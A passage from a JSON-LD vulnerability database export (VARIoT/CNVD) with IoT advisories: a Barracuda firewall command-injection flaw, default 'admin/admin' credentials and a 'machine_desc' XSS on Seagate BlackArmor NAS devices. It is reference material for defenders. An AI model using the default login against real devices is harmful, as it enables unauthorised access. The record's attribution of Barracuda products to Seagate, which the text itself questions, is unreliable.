          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 0.6,
            "url": "https://pentest.blog/advisory-seagate-central-storage-remote-code-exec"
          },
          {
            "trust": 0.6,
            "url": "https://www.seebug.org/vuldb/ssvid-98127"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02702"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02702"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-01-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-02702"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-01-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-02702"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate Central Storage Remote Code Execution Vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02702"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201608-0496

    Vulnerability from variot - Updated: 2022-05-17 01:46

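    Barracuda is the general name for a hard drive product line from Seagate Technology. Barracuda Web App Firewall firmware and Load Balancer firmware have a remote command execution vulnerability. An attacker can exploit this vulnerability to inject content into a system command by sending a specially crafted request. (The product names and the referenced Exploit-DB entry 40176 appear to describe Barracuda Networks appliances rather than Seagate drives, so confirm the vendor attribution against the CNVD source before using this record for asset matching.)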


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201608-0496",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "technology barracuda web app firewall",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "seagate",
            "version": "\u003c=8.0.1.008"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-06010"
          }
        ]
      },
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2016-06010",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "CNVD",
                "id": "CNVD-2016-06010",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-06010"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Barracuda is the general name for a hard drive product line from Seagate Technology. BarracudaWebAppFirewallFirmware, LoadBalancerFirmware has a remote command execution vulnerability. An attack can exploit this vulnerability and inject it into a system command by sending a specially crafted request.",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-06010"
          }
        ],
        "trust": 0.6
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "EXPLOITDB",
            "id": "40176",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "40176",
            "trust": 0.6
          },
          {
            "db": "CNVD",
            "id": "CNVD-2016-06010",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-06010"
          }
        ]
      },
      "id": "VAR-201608-0496",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-06010"
          }
        ],
        "trust": 1.6
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-06010"
          }
        ]
      },
      "last_update_date": "2022-05-17T01:46:27.084000Z",
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 0.6,
            "url": "https://www.exploit-db.com/exploits/40176/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-06010"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-06010"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2016-08-04T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2016-06010"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2016-08-04T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2016-06010"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Barracuda Web App Firewall/Load Balancer Remote Command Execution Vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-06010"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201309-0592

    Vulnerability from variot - Updated: 2022-05-04 09:57

    The Seagate BlackArmor NAS is a network storage device. The Seagate BlackArmor NAS 110 / 220 has a default user account, "admin/admin", which remote attackers can use to gain unauthorized access to the device.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201309-0592",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "technology llc blackarmor nas",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "seagate",
            "version": "110"
          },
          {
            "model": "technology llc blackarmor nas",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "seagate",
            "version": "220"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13029"
          }
        ]
      },
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2013-13029",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "CNVD",
                "id": "CNVD-2013-13029",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13029"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The Seagate BlackArmor NAS is a network storage device. Seagate BlackArmor NAS 110 / 220 has a default user account \\\"admin/admin\\\" that allows remote attackers to use this account to gain unauthorized access to the device.",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13029"
          }
        ],
        "trust": 0.6
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13029",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13029"
          }
        ]
      },
      "id": "VAR-201309-0592",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13029"
          }
        ],
        "trust": 1.6
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13029"
          }
        ]
      },
      "last_update_date": "2022-05-04T09:57:22.267000Z",
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 0.6,
            "url": "http://dariusfreamon.wordpress.com/2013/09/10/seagate-nas-default-credentials-and-xss/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13029"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13029"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2013-09-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2013-13029"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2013-09-17T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2013-13029"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate BlackArmor NAS 110 / 220 WEB Interface Default Management Account Vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13029"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201309-0596

    Vulnerability from variot - Updated: 2022-05-04 09:05

    The Seagate BlackArmor NAS is a network storage device. The /admin/system_general.php script on the Seagate BlackArmor NAS 110 / 220 does not properly filter input submitted through the 'machine_desc' parameter, allowing remote attackers to inject malicious script or HTML code and thereby obtain sensitive information or hijack user sessions when the malicious data is viewed.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201309-0596",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "technology llc blackarmor nas",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "seagate",
            "version": "110"
          },
          {
            "model": "technology llc blackarmor nas",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "seagate",
            "version": "220"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13028"
          }
        ]
      },
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2013-13028",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "CNVD",
                "id": "CNVD-2013-13028",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13028"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The Seagate BlackArmor NAS is a network storage device. The Seagate BlackArmor NAS 110 / 220 /admin/system_general.php script incorrectly filters the input submitted by the \u0027machine_desc\u0027 parameter, allowing remote attackers to exploit the vulnerability to inject malicious scripts or HTML code to obtain sensitive information or hijack users when malicious data is viewed Conversation.",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13028"
          }
        ],
        "trust": 0.6
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13028",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13028"
          }
        ]
      },
      "id": "VAR-201309-0596",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13028"
          }
        ],
        "trust": 1.6
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13028"
          }
        ]
      },
      "last_update_date": "2022-05-04T09:05:38.864000Z",
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 0.6,
            "url": "http://dariusfreamon.wordpress.com/2013/09/10/seagate-nas-default-credentials-and-xss/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13028"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13028"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2013-09-16T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2013-13028"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2013-09-17T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2013-13028"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate BlackArmor NAS 110 / 220 machine_desc parameter cross-site scripting vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13028"
          }
        ],
        "trust": 0.6
      }
    }